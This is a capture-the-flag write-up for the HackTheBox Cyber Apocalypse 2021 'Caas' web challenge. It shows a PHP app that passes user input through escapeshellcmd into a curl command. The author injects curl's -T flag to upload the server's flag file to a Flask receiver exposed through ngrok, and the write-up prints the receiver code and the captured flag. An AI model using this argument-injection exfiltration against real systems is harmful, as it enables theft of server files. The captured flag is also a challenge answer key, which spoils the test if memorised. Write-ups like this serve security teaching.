Tags: python curl port_forwarding burpsuite flask ngrok 

Rating:

## Caas Web Challenge writeup Cyber Apocalypse 2021 HackTheBox CTF

Post by [Gaurav Raj](https://thehackersbrain.github.io/) on April 24, 2021, 11:36 a.m.

## **Introduction**

Name: **Caas**

Difficulty: 1 star

Points: 300

Description:

cURL As A Service or CAAS is a brand new Alien application, built so that humans can test the status of their websites. However, it seems that the Aliens have not quite got the hang of Human programming and the application is riddled with issues.
This challenge will raise 43 euros for a good cause.

![](https://thehackersbrain.pythonanywhere.com/media/post-image/caas_banner.png)

### **Exploitation**

After analyzing the source code of the application found that the application is using **escapeshellcmd(url)** for executing the **CURL** command.

```php
$this->command = "curl -sL " . escapeshellcmd($url);
```

Here we can see that the application is concatenating the URL we pass with the curl command which means we can pass any **CURL** flag as well, So if we can do this, then we can potentially upload the **flag** file to our own server.

![](https://raw.githubusercontent.com/thehackersbrain/thehackersbrain.github.io/master/images/joker/php_escapeshell.png)

Sound Interesting Right ?? Let's do it.

Here we created a **flask** server to receive the flag. and used **ngrok** (which can be downloaded from [here](https://ngrok.com/download)) to forward the port, as we have to listen to connection over the Internet.

```python
#!/usr/bin/python3
from flask import Flask, request

app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])
def index():
return "This API is working"

@app.route('/flag/<file>', methods=["PUT"])
def flag(file):
with open('flag', 'w') as flag:
flag.write(str(request.stream.read()))
return '<h1 align="center">Flag Recieved</h1>'

app.run(debug=True, host="0.0.0.0")
```

and here's the set setup for ngrok

![](https://raw.githubusercontent.com/thehackersbrain/thehackersbrain.github.io/master/images/joker/ngrok_fwd.png)

Now we intercepted the request with **BurpSuite** and added the URL of our flask server with the flag **\-T** and here we got our flag on the root directory of our server.

![](https://raw.githubusercontent.com/thehackersbrain/thehackersbrain.github.io/master/images/joker/burp_request.png)

and here we got our flag.

```bash
CHTB{f1le_r3trieval_4s_a_s3rv1ce}
```

![](https://raw.githubusercontent.com/thehackersbrain/thehackersbrain.github.io/master/images/joker/got_flag.png)

Thanks, everyone for reading this article, Don't forget to share if you liked it.

Original writeup (https://thehackersbrain.pythonanywhere.com/blog/caas-web-challenge-writeup-cyber-apocalypse-2021-hackthebox-ctf/).